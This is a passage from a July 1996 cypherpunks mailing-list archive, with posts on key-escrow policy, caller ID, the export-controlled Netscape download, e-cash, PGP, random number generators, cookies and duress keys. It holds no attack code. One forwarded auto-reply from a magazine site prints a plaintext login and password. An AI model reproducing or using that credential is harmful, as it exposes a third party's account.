Internet standard. I trust the market and my fellow citizens, and if they
rush to GAK because of superior features or some such and non-GAK dies on
the vine because it is poorly implemented or poorly marketed, that's the way
freedom works. You can't compel others to user YOUR favorite system just so
you can have the benefits from it you want, nor should others try to
suppress your favorites. That sword cuts both ways--vis a vis the
government's favorites. They shouldn't try to compel what thye like, nor
should they suppress what they don't unless the people's representatives
have legislated (as for example in the case of the authority for ITAR) and
the matter is Constitutional.

I think foreign governments' crypto policies to be none of my
business--though I know some other Americans love to wrap themselves in high
moral raiment and preach on the topic to such foreign governments, and many
foreigners with motes in their own eyes like to do that to us. I have a
personal opinion in the matter which is likely the same as yours, but do not
feel entitled to burden others with that since it's so much ineffectual chin
music.

>Despite trying to hide behind the smokescreen of calling the
>government's GAK position "voluntary," we all know that they are trying to
>misuse their influence to gently force us to use GAK, if by no other means
>that forcing the taxpayer to pay for the system as they have done already.

I agree, though I would not have phrased it in such an offensive way. This
isn't some conspiracy of evil but people with a legitimate policy
disagreement.

>
>The opponents of GAK, on the other hand, are not denying to anyone the
right
>to implement a truly voluntary "key-escrow" system, or more likely many
>privately operating ones.

I disagree again. It is evident from the effort to shoot down Clipper I,
which WAS voluntary, that this is another case of your version of
"voluntary". If an offeror, even the government, offers something voluntary
and you don't like it, you attempt to suppress it. It's kinda like "freedom
of speech only for those who agree with me".

> However, such systems will be a service for the
>customer, not the government, and the key will almost certainly not be
>provided to the government on request, and in fact the key will likely be
>stored in an encrypted form that the government won't be able to use.

To the contrary, business records are always available on legitimate
subpoena by the government, and this would include escrowed keys. YOU don't
have to like it, but it's the law.

>
>Quite simply, we do not require your "assent."  You should be trying to get

>OURS.

"Silence does not constitute assent" to your personal attacks, your policy
assertions, and what I think to be your misrepresentations of fact. I was
not speaking of assent to GAK in that sentence.

I think your attempt to pseudospeciate me and create an "us and him"
situation in this group is bound to fail with those who have paid attention
to what I think and say, particularly my most recent thinking. On many
matters we are agreed at bottom. However, I place high value on policy and
strategy advocacies that are content-robust and work, in preference to
ineffectual ones that merely make one feel good. Further, I do not believe
one should suppress criticism of one's allies when they are doing a sloppy
or wrong-headed job of things. That's just opening the door to a failure
instead of sharpening things up to improve the chances of a success. The
radical feminists' "Sisterhood, right or wrong" is not my motto. When you're
right, you're right and I support you, and when I think you're wrong I won't
hesitate to point it out.

David


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMequPEwgH+NYrQ81AQG56AP/VPJC454h+OWdCZ0i8BajL+7YtZ3z3QkR
foCov4Fy4msK45uwaNCnHnIwqvwNksoZRVCDValY74r9GAB5f/Em5TFWVxe8WLz8
44hZ739RfPBKJH1F7M/JUY7RMwIwxsFtaYWt89pwc9mZyXwoHT5xXdbojXakf8HI
MRLTEaqbB8M=
=1WC/
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Erika <esherman@umich.edu>
Date: Tue, 16 Jul 1996 09:25:18 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607151636.MAA04446@jekyll.piermont.com>
Message-ID: <Pine.SOL.3.91.960715140934.12554D-100000@strudel.rs.itd.umich.edu>
MIME-Version: 1.0
Content-Type: text/plain


Sometimes if you have the operator dial the number, the caller ID won't 
work (and neither will ANI).



On Mon, 15 Jul 1996, Perry E. Metzger wrote:

> 
> Eric Murray writes:
> > When I called the Pac Bell customer service droids to get my "complete"
> > blocking I asked them why they won't block CID to 800 numbers.
> > Their answer: "that's just the way it works". 
> 
> There is a really easy reason for this.
> 
> When you call an 800 number, the other guy gets billed. The person
> that gets billed has a legal right to know the call details of a toll
> call they are paying for. If you don't want them to know where you are
> calling from, don't ask them to pay for it.
> 
> Perry
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: hotlists@d-comm.com
Date: Tue, 16 Jul 1996 10:36:20 +0800
Subject: d.Comm: Your Login Information
Message-ID: <199607151820.OAA21615@sol.spiders.com>
MIME-Version: 1.0
Content-Type: text/plain




Thank you for logging into d.Comm. At d.Comm we believe a key part of any
successful product, magazine or other, is a comprehensive knowledge of the
market; in our case our readers.

The information you provide us with not only helps us to fine-tune the
magazine, but also enables you to manage your information content, through
the hotlist section.

We therefore wish to thank you once again for helping us to keep d.Comm
dynamic.

When your World Wide Web browser prompts you for a login and password use the
following:

           Login: cypherpunks
          Passwd: 107084
             URL: http://www.d-comm.com/
 
(note: your login is case-sensitive)

You may end up back at the login when you try to enter a section of 
d.Comm that you attempted to enter before you received your username.  
If this happens, please click the reload button on your Web browser.  

If you have trouble and need some help, please send mail to:

         hotlists@d-comm.com

Note: If you wish to change your allotted password, Password management is
      available at :

         http://www.d-comm.com/s-bin/hl_passwd

If for any reason you encounter any problems, please do not hesitate to
contact us.      



----------------------------------------------------------------------------
Eddie Hold
Editor
d.Comm & Communicate
The Economist Group
http://www.d-comm.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 16 Jul 1996 15:59:20 +0800
To: cypherpunks@toad.com
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EA98B6.446B@netscape.com>
Message-ID: <31EAB98B.3F54@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Tom Weinstein wrote:
> 
> The US versions of Netscape Navigator 3.0 beta 5 and FastTrack Server
> 2.0 are now available for download.  Obviously, this is only available
> to US citizens or permanent residents.  You can get it from
> http://wwwus/eng/US-Current/

Clearly I'm an idiot.  The correct URL is:

http://wwwus.netscape.com/eng/US-Current

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 16 Jul 1996 10:52:52 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
Message-ID: <2.2.32.19960715184219.00827588@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:20 AM 7/15/96 -0700, David Sternlight wrote:
>At 3:50 AM -0700 7/15/96, Duncan Frissell wrote:
>>At 09:35 PM 7/14/96 -0700, David Sternlight wrote:
>>
>>>Did you miss the part in the Constitution about "provide for the common
>>>defence"
>>
>>That's a meaningless part of the Preamble.
>
>Anyone who thinks substantive parts of the Preamble are "meaningless" is
>deserving only of contumely. Perhaps you should review your high school
>civics course--you did have one of those, yes?
>
>David
>

Welcome to the list.

Yes my high school Civics class was good.  So were my law school Con Law
courses.

Yes, David I would say you practice "contumely" -- Rudeness or contempt
arising from arrogance; insolence.  But then so do I.

I'll say again, the Preamble speaks of the reasons the drafters of the
Constitution had for writing the thing, it does not set forth any powers of
the federal government.  Goals not means.  GAK is a means not a goal.  

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 16 Jul 1996 22:59:15 +0800
To: cypherpunks@toad.com
Subject: Chicago Area Cypherpunks Try 2.
Message-ID: <Pine.LNX.3.93.960715144503.266D-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain



     Ok, I'm an idiot. The first time I posted this I forgot that the machine
that the account that the cypherpunks mail goes thru was going to die. In 
otherwords, Crash did. 

     I recieved a total 5 responses to a suggestion of a cypherpunks meet, and
 this is what I sent them earlier : 

     There were 5 respondents, not including erehwon@c2.org, but he is the 
one who first affirmed the idea in my head. 

     There may have been more, but my account at crash.suba.com (infact the 
whole machine) went away shortly after I posted, so I may have missed some
responces. I am going to post again, so if you got this you don't need to 
re-respond. If you didn't get this, please respond and tell me how you are 
reading it without getting it. 

     Is there anyone else out there who might want to organize this thing?

     I don't mind doing it, but I tend to be a little authoritarian about
these kinds of things. I arrange an almost monthly meeting for a bunch
of freaks on Usenet, and it has been my experience that the best way 
of doing these things is simply to announce a time and a place and 
stick to it unless there is a _major_ event that causes a change. On the 
other group I have the meetings at my house, and my Wife's grand mother 
died. Immediate grounds for a change other reasons could be a major 
conference that I didn't know about etc. An individual being out of town is
not a reason, at every random event there will be someone who would prefer 
a different day. 

     The other thing to consider is where to hold the event. There are 
a couple of decent pubs/bars here in Chicago, or Coffee Houses. I 
would prefer not to hold the first one in my home, because I am paranoid.

     Anyway, a couple of the responses were from out of town, so I think
it might be a good idea to do this on a weekend. 


_______________________________________________________________________

     If you responded, and would like to be in on the discussion, please
re-respond. Sorry for the inconvience and the lousy spelling.


Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Tue, 16 Jul 1996 13:56:36 +0800
To: "Mark M." <cypherpunks@toad.com
Subject: Re: Markoff on Clipper III
Message-ID: <199607152221.PAA17923@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:30 PM 7/15/96 -0400, Mark M. wrote:

>Nowhere in the Constitution does it say that firearms (or crypto in this case)
>are a threat to national security.  In fact, the second amendment explicitly
>dictates that people have the right to own firearms. 

No, it says "arms," not "firearms."   Firearms are a subset of "arms," which 
a nearby dictionary defines as "objects used as weapons."  By that 
definition, chemicals and biologicals, as well as explosives of all sorts, 
are "arms."

Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arun Mehta <amehta@giasdl01.vsnl.net.in>
Date: Mon, 15 Jul 1996 22:10:24 +0800
To: David Sternlight <cypherpunks@toad.com
Subject: Re: CDT Policy Post 2.27 - No New News on Crypto: Gore Restates
Message-ID: <1.5.4.32.19960715151942.002d643c@giasdl01.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain


At 10:17 14/07/96 -0700, David Sternlight wrote:
>At 7:05 AM -0700 7/13/96, Deranged Mutant wrote:
>>On 12 Jul 96 at 18:23, Bob Palacios posted:
>>> *  Called for the liberalization of export controls provided computer
>>>    users participate in a "global key management infrastructure"
>>>    designed to make personal encryption keys accessible to law
>>>    enforcement.
>>
>>This is particularly problematic...

>Your best shot would be to make sure the part about the system being
>voluntary was hard-wired into any legislation or rule-making. Unless and
>until ITAR is modified by Congress, the USG has what Mark Twain called "the
>calm confidence of a Christian with four aces" on this matter.

International agreement on this issue won't happen this century.
People don't understand the problem (or why it needs regulation),
are suspicious of the US and its motives -- in any case
international negotiations take forever. As for the "concession"
regarding liberalisation of export controls of crypto -- big
deal. The stuff is available anyway outside the US, so the only
people helped are US industry -- why should the rest of the world care? 

Without international agreement, the whole key escrow idea
doesn't have a leg to stand on, and I doubt US industry will be
willing to wait that long before  they can use strong crypto in
their international products.

Arun Mehta Phone +91-11-6841172, 6849103 amehta@cpsr.org
check out my new page at http://www.cerfnet.com/~amehta/  
The protestors of Tiananmen Square will be back. Next time, 
the battle will be fought in cyberspace, where the students 
have the more powerful tanks...





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bryce@digicash.com
Date: Tue, 16 Jul 1996 02:19:51 +0800
To: "David G.W. Birch" <daveb@hyperion.co.uk>
Subject: Re: #E-CASH: PRODUCT OR SERVICE?
In-Reply-To: <1374700491-41210125@mail.hyperion.co.uk>
Message-ID: <199607151336.PAA27295@digicash.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

David G.W. Birch <daveb@hyperion.co.uk> wrote:
>
> Johan,
> 
> >Careful there. At least ecash is a registered trademark. And as far as I know
> 
> It is alleged that a trademark has been applied for on the term "ecash" 
> in some countries: that's why Robert was careful (as we always are) to 
> use the term "e-cash" instead.


"Ecash" is a registered trademark of DigiCash.  It is registered
with the Benelux trademark office and the United States
trademark office.  I believe that it is considered unwise to use
minor variations on trademarked names, but I'm not an
intellectual property rights lawyer.


> >Mondex isn't one of the true electronic cash systems. Please correct me if
> >I'm wrong, but isn't mondex an electronic debit card system?
> 
> Mondex is _the only_ true electronic cash system in the world that I know 
> of, precisely because it isn't an electronic debit card system (like 
> Avant) or digital travellers' cheques (like Digicash).


I think it would behoove us all to clarify our terms.  I call
Ecash(tm) coins "electronic cash" for several reasons.  Ecash(tm)
has all of the following characteristics in common with
conventional cash, in descending order of importance:


1.  Unforgeability.  Ecash(tm) coins have intrinsic value 
because they are cryptographically impossible to forge.



2.  Finality.  Payments are cleared on the spot.  No outstanding
payment obligations remain after a purchase.

3.  Bi-directionality.  Payers and recipients use the same 
software and the same protocol.  It is not necessary for
recipients to be specially trusted by the bank or by the payers.

4.  Privacy.  The privacy of Ecash(tm) payers is mathematically
unconditional.

5.  Composability.  You can make large Ecash(tm) payments out of
a collection of smaller Ecash(tm) coins.  This is in contrast to
a check-based system where you typically draw a check for the
exact amount and transfer only a single check.

6.  Small payments.  Ecash(tm) coins are cheap enough to use 
that they are practical for small payments.

(As a note, I do not use the word "micropayments" here, because
I am beginning to think that a good technical definition of
"micropayments" is "payments whose value is less than the cost
of using current electronic coins".  This qualifies schemes like
Shamir's and disqualifies, well...  current electronic coins.)


There might be other angles we should talk about here.


I think that the first quality is the defining one, technically.


So, could a knowledgeable person e.g. Mr. Birch tell us why
Mondex should be considered to be "electronic cash"?  


And similarly I would like to hear an informed opinion about 
why Ecash(tm) should not be considered "electronic cash".  
I tend to agree that Ecash(tm) would be even _more_ cashlike 
if it were cleared off-line, but I don't consider that 
difference very fundamental.  (_Any_ digital money based on 
our current understandings will have to be cleared at a 
central clearer eventually, since digital information is 
perfectly copyable.)


Thank you for your correspondance.


Regards,

Bryce

Ecash 2.x Team




-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i
Comment: Auto-signed under Unix with 'BAP' Easy-PGP v1.1b2

iQB1AwUBMepI/UjbHy8sKZitAQEiJwL/VnpQEHL1rOQ6Hm9JIEgAfCGjSKOPaIiC
Jp7EVjvPoFYEsQAS4iUWybNLpxi/23uaqpXMCSNMrEwqd8WeC5ZSISldIEK/BnYE
2bULeAeMhIqm92bP6o64ok1NBGPfvK5X
=ANO4
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Charley Sparks" <sparksc@worldnet.att.net>
Date: Tue, 16 Jul 1996 13:03:57 +0800
To: cypherpunks@toad.com
Subject: re: Organized Crime Home Page - Four Horsemen, No Waiting
Message-ID: <199607151936.TAA19063@mailhost.worldnet.att.net>
MIME-Version: 1.0
Content-Type: text/plain


>Well, with the UCMJ ( Uniform Code of Military Justice ) and the Oath
>of Allegiance Military Personnel take on induction being re-written
>to Support and defend the United Nations and to accept direct and
>lawful orders from UN personnel, this doesn't surprise me.Soon, UN
>Secretary-General Boutros Boutros-Ghali, or someone like him will
>repeal more of the amendments to our constitution.  First our guns,
>then our code. 
>
>I'll give up my pass phrase when
> they pry it from my cold dead fingers !
               Charley Sparks
            Booz Allen & Hamilton
http://www.clark.net/pub/charley/index.htm
            Public Key  Available




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Thomas C. Allard" <m1tca00@FRB.GOV>
Date: Tue, 16 Jul 1996 16:47:29 +0800
To: cypherpunks@toad.com
Subject: ViaCrypt pgp v.4
Message-ID: <9607151952.AA18873@bksmp2.FRB.GOV>
MIME-Version: 1.0
Content-Type: text/plain



Well, my site just got ViaCrypt pgp version 4 (Personel Edition) and it was 
the first I'd heard of it.  None of my utilities that worked with the old 
ViaCrypt pgp 2.7.1 seem to work under version 4 (the script that checks 
signatures dies, as does the exmh interface which can no longer find my 
personal keys).

I assume that these are mostly due to changes in the command-line options, 
although I can find no list of what exactly has changed.

But my REAL question is will this version of pgp be compatible with the 
international versions?  If not, I'd just assume revert to pgp 2.6.2 from 
MIT.


rgds-- TA  (tallard@frb.gov)
I don't speak for the Federal Reserve Board, it doesn't speak for me.
pgp fingerprint: 10 49 F5 24 F1 D9 A7 D6  DE 14 25 C8 C0 E2 57 9D






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Wed, 17 Jul 1996 00:38:16 +0800
To: cypherpunks@toad.com
Subject: Washington Post -- "Block but Verify"
Message-ID: <v01510103ae1062fbecc1@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


[An editorial in today's Washington Post, about blocking software and the
CyberWire Dispatch that Brock and I sent out earlier this month. --Declan]



http://www.washingtonpost.com/wp-srv/WPlate/1996-07/15/006L-071596-idx.html

Editorial: "BLOCK, BUT VERIFY"

Monday, July 15 1996; Page A18
The Washington Post

   THE NEXT generation of highly publicized Internet products may have
   less to do with what you can get from the Net than with what you can
   protect yourself against getting. In the wake of the concern over
   pornography that sparked the now-overturned Communications Decency
   Act, vendors have rushed to market software with names like SurfWatch
   and NetNanny.

[...]

   Some incidents of what might be called over-screening are accidents
   resulting from the overzealous use of keywords or other sweeping means
   by the inexperienced. Others are exactly what the products' makers
   intend...

   An on-line article by cyberjournalists Brock Meeks and Declan
   McCullough reported on a product called CyberSitter, marketed by the
   conservative group Focus on the Family, that blocks access to any
   discussions of homosexuality. It's advertised as a product for
   families who want just that: a relatively G-rated version of
   cyberspace.

   The feasibility and ready availability of such products is, of course,
   a strong argument that the government needn't meddle. Anyone, not just
   those worried about porn, should soon be able to find software that
   edits what a family wants edited and lets through what it wants to
   read. One pitfall, though, as Messrs. McCullough and Meeks observe, is
   the commercially inspired reluctance of many of these producers of
   software to specify exactly what they are blocking. Though
   understandable, this raises obvious dangers that products meant to
   block one type of transmission -- violence, for example -- will in
   fact muffle wider areas of debate. Smart consumers will want, and
   demand, to know what they're not getting, the better to make use of
   the information they have.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: sameer <sameer@c2.net>
Date: Tue, 16 Jul 1996 13:56:55 +0800
To: tomw@netscape.com (Tom Weinstein)
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EAB98B.3F54@netscape.com>
Message-ID: <199607152318.QAA22448@atropos.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


> Clearly I'm an idiot.  The correct URL is:
> 
> http://wwwus.netscape.com/eng/US-Current

	Not like that's tough to figure out. Congrats. It's cool to
actually be able to connect to my webserver using real encryption.
Glad the lawyers don't think Barksdale is going to jail anymore.

-- 
Sameer Parekh					Voice:   510-986-8770
Community ConneXion, Inc.			FAX:     510-986-8777
The Internet Privacy Provider
http://www.c2.net/				sameer@c2.net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 16 Jul 1996 13:06:55 +0800
To: Declan McCullagh <declan@well.com>
Subject: Re: Seek-and-Destroy
In-Reply-To: <v01510100ae100d6e192f@[204.62.128.229]>
Message-ID: <Pine.LNX.3.93.960715161736.171A-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, Declan McCullagh wrote:

> Do NOT visit:
>   http://xxx.lanl.gov/seek-and-destroy
> 

     So of course I did. Very Interesting. 
    
     Those guys *rock*.

> The sysadmins for xxx.lanl.gov don't like robots visiting their web site,

     They also aren't real happy with PC's, Mac's, or Netscape. 

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <s_levien@research.att.com>
Date: Tue, 16 Jul 1996 23:41:00 +0800
To: cypherpunks@toad.com
Subject: Clueless "Attachment converted" uses
Message-ID: <Pine.SGI.3.93.3.960715163006.21363B-100000@asparagus.research.att.com>
MIME-Version: 1.0
Content-Type: text/plain


Simon Spero wrote:
> 
> On a very similar note - could people who are using clear-text PGP
> signatures with mime use text/... instead of application/...; that way
> people without pgp will see the message text without having to mess with
> their mailcaps (that's the way text/* is supposed to work)

I'd hate to turn this into "e-mail encryption"-punks, but I believe that 
clear-signed PGP messages should not have MIME types at all. Here's why:

1. All PGP-aware mail reading programs can recognize MIMEless PGP 
messages. Thus, adding the MIME type does not help.

2. For all mailers that are not PGP-aware, the best way to handle 
clearsigned messages is to cut-and-paste them to a PGP window. This is 
most easily done if the message is simply displayed as text. Thus, 
adding the MIME type does not help.

3. There _is_ a PGP/MIME standard, and these clearsigned PGP messages do 
not conform to it.

ObPlug: premail, I believe, implements the correct policy. Some messages 
need to be in MIME format (e.g. pictures). These messages are encoded 
using the real PGP/MIME spec. Other messages do not. These are encoded 
using plain PGP, and no MIME gorp.

There is a small bug in 0.44, by the way, that causes messages with tabs 
to be wrongly classified as needing MIME.

Just my two cents.

Raph





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Christopher Hull <nozefngr@apple.com>
Date: Tue, 16 Jul 1996 16:18:50 +0800
To: <cypherpunks@toad.com>
Subject: CookieScan 0.0 rev 0
Message-ID: <199607152332.QAA14438@apple.com>
MIME-Version: 1.0
Content-Type: text/plain




Do y¹all think there might be an interest in a
utility which would allow the user to deal with
browser cookies?

What I imagine is a little utility that would
display the cookies stashed on a machine and
give the user the option to either delete or
<snicker> edit </snicker> any given cookie.
(Hey, it¹s *your* computer, not the website¹s).

This little app would also come with help text
explaining what a cookie is (and is not).  In
future it might run in the background and alert
the user when a cookie is being dropped and the
user could give or deny permission (Netscape 3.0
will do this as well).

As it is an ³anti-virus² type product it would
be offered for free.  I could just stick it up
on Apple¹s (or Netscape's) website when finished.

Do any such utilities currently exits?

-Chris



...
...    smtp: nozefngr@apple.com
..     page: 1.800.680.7351
..     http: http://virtual.net/Personal/nozefngr/
..     icbm: lat37*21'.lon121*5'
..
..  the kabuki project: http://remarque.berkeley.edu/kabuki/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Tue, 16 Jul 1996 15:21:29 +0800
To: Jack Mott <thecrow@iconn.net>
Subject: Re: Hardware RNG
Message-ID: <199607160009.RAA28737@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>	Got a geiger counter plugged into the game port
Cool.  As other people have noted, the game port may do timing things
that can degrade the quality of your random numbers a bit, so don't
use too many bits per sample unless you really understand its behaviour.
>	Weak radioactive source next to it (dont worry wont fry you)
>	Use a PRNG string to do create an RC4 S-box
>	Cycle through the S-box in a tight loop, each time checking to 
>see if the geiger counter got a hit, if it did, record that number in 
>the S-box as our first byte, do this 100 times, and we have 100 random 
>numbers.

Other people have also commented that this is bad, unless you can
show that the math behind it works well and usefully.

>any thoughts? It seems to work well, no basic stat analysis reveals any 
>pattern, and physicists have backed me up on radioactive decay being 
>'the great randomizer'.

The real randomness you have is from the radioactive decay intervals,
plus or minus any gain from the game port hardware.  No need to muck that
up with RC4, especially in ways that may add predictability.  
Be very careful with statistics - if something's grossly skewed, the usual
tests will pick it up, but they can't tell if there's a mathematical way
for somebody who knows data point N to predict point N+1.  If you look
at the output of your geiger counter system, you'll probably see a roughly
exponential distribution of time intervals between hits (which is the
result of uniformly distributed events like radioactivity) modified a bit
by your game port behavior (e.g. the times may all be multiples of 1ms or 17ms.)
You can extract decent random bits from this by inverting the distribution;
if you want really high quality randoms, at lower resolution, 
you can do something like pick two samples and return 0 or 1 depending on 
which one is shorter - especially useful if you don't trust the game port.

Your generator can't give you more real bits than that; the RC4 just
obfuscates it, makes it harder to evaluate the real strength, and
evens out the distributions.  You could still crunch the bits through
MD5 or something, but only use as many bits of output as you're sure
the generator is really giving you.

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Re-delegate Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 16 Jul 1996 13:47:47 +0800
To: "Perry E. Metzger" <perry@piermont.com>
Subject: Re: Can't block caller ID in Massachusetts?
In-Reply-To: <199607151636.MAA04446@jekyll.piermont.com>
Message-ID: <Pine.SCO.3.93.960715171808.7563C-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, Perry E. Metzger wrote:

> 
> Eric Murray writes:
> > When I called the Pac Bell customer service droids to get my "complete"
> > blocking I asked them why they won't block CID to 800 numbers.
> > Their answer: "that's just the way it works". 
> 
> There is a really easy reason for this.
> 
> When you call an 800 number, the other guy gets billed. The person
> that gets billed has a legal right to know the call details of a toll
> call they are paying for. If you don't want them to know where you are
> calling from, don't ask them to pay for it.

Well put.  I guess a lot of folks forget the basic premise of an 800 call.
It's a non-operator assisted collect call and, _yes_, the calling party
should know who's calling so they can decide if they want to take the call
(yes, there are "out of service area" screening services already
available for inbound 800 numbers). 

HOWEVER, ANI is available to anyone who wants to pay for it, not just
those folks with inbound 800 service.  Thus, I'd contend that there should
be ANI blocking services, but that they should not be used against 800
numbers.  This lack of anonymity via the phone service presents a
disturbing precedent in terms of it being used as model for the Internet,
particularly once "pay for it" services become more common.

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 16 Jul 1996 15:19:31 +0800
To: sameer <sameer@c2.net>
Subject: Re: US versions of Netscape now available
In-Reply-To: <31EAB98B.3F54@netscape.com>
Message-ID: <31EAE59C.1074@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


sameer wrote:
> Glad the lawyers don't think Barksdale is going to jail anymore.

  We received written permission from the State Department for our
download verification mechanism.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark O. Aldrich" <maldrich@grci.com>
Date: Tue, 16 Jul 1996 14:01:11 +0800
To: Deranged Mutant <WlkngOwl@unix.asb.com>
Subject: Re: Opiated file systems
In-Reply-To: <199607151158.HAA28540@unix.asb.com>
Message-ID: <Pine.SCO.3.93.960715172915.7563D-100000@grctechs.va.grci.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 15 Jul 1996, Deranged Mutant wrote:

<snip - much stuff on crypto device drivers for disk subsystems deleted>
> 
> > - Facility for duress key, with the real data hidden in the unused
> >   space of the first encrypted drive.  To increase the plausible
> 
> Huh?!?
> 

Hey, DM, don't laugh.  I've gotten such requests before about crypto
subsystems, including tokens with "protected" keys onboard.  The idea is
that there's a "duress key" or a "panic key" that, when entered, fools
someone into thinking the process is working but, in fact, it's not
working at all and it usually is doing something else (like scrubbing the
hard disk, scrubbing the key PROM, or calling the police).

I've worked at sites that have their electronic door locks rigged the same
say.  The way it works is, let's say a terrorist has a gun to your head
and demands, "let me in the door or I'll blow your head off."  Naturally,
the Government doesn't want you to have to choose between dying and giving
out the cypher lock combination (guess which one people choose in blind
testing?), so you put in the "duress code."  The door unlocks so the
terrorist thinks that all is well.  However, the alarm just went off over
at the security substation and, in about two minutes, a heavily armed SWAT
team will be arriving. 

Same for cypto keys, but with a different "payload" if the duress key is
used.  The data either gets "nuked" (Gosh, Mr. FBI Agent, I *thought* that
was the right crypto key - sorry about destroying the hard disk), the keys
disappear (damn! my fortezza card just zeroized again!), or the data
appears to "decrypt" but it's actually phoney data that's been hidden
somewhere or is 'hard-coded' into the program handling the duress key. 

The payload of getting false data out of a crypto algorithm, such that the
data looks "real", when a duress key is input to the algorithm is not
something that I've seen approached in any reasonable manner.  Probably
because it's just too damn hard and the notion of "real looking" data is a
little hard to define scientifically.  A combination stego/crypto solution
may be more appropriate, but close examination of the box is going to
reveal what happened (assuming the desired solution must withstand some
protracted forensics?).  The nuke_the_data or nuke_the_keys solutions are
easier to do, and have been implemented in several situations of which I
am aware.  

------------------------------------------------------------------------- 
|Just as the strength of the Internet is  |Mark Aldrich                 |
|chaos, so the strength of our liberty    |GRCI INFOSEC Engineering     |
|depends upon the chaos and cacophony of  |maldrich@grci.com            |
|the unfettered speech the First Amendment|MAldrich@dockmaster.ncsc.mil |
|protects - District Judge Stewart Dalzell|                             |
|_______________________________________________________________________|
|The author is PGP Empowered.  Public key at:  finger maldrich@grci.com |
|    The opinions expressed herein are strictly those of the author     |
|         and my employer gets no credit for them whatsoever.           |
-------------------------------------------------------------------------





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jeff Weinstein <jsw@netscape.com>
Date: Tue, 16 Jul 1996 19:45:00 +0800
To: Christopher Hull <nozefngr@apple.com>
Subject: Re: CookieScan 0.0 rev 0
In-Reply-To: <199607152332.QAA14438@apple.com>
Message-ID: <31EAE914.5336@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Christopher Hull wrote:
> What I imagine is a little utility that would
> display the cookies stashed on a machine and
> give the user the option to either delete or
> <snicker> edit </snicker> any given cookie.
> (Hey, it¹s *your* computer, not the website¹s).

  I doubt that you will have much luck here.  Many (most??) sites
that use cookies tend to encode or obscure them so that they are not
human readable.  Certainly anyone doing something questionable
will obscure their cookies so that they will not be user readable
or editable.

	--Jeff

-- 
Jeff Weinstein - Electronic Munitions Specialist
Netscape Communication Corporation
jsw@netscape.com - http://home.netscape.com/people/jsw
Any opinions expressed above are mine.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
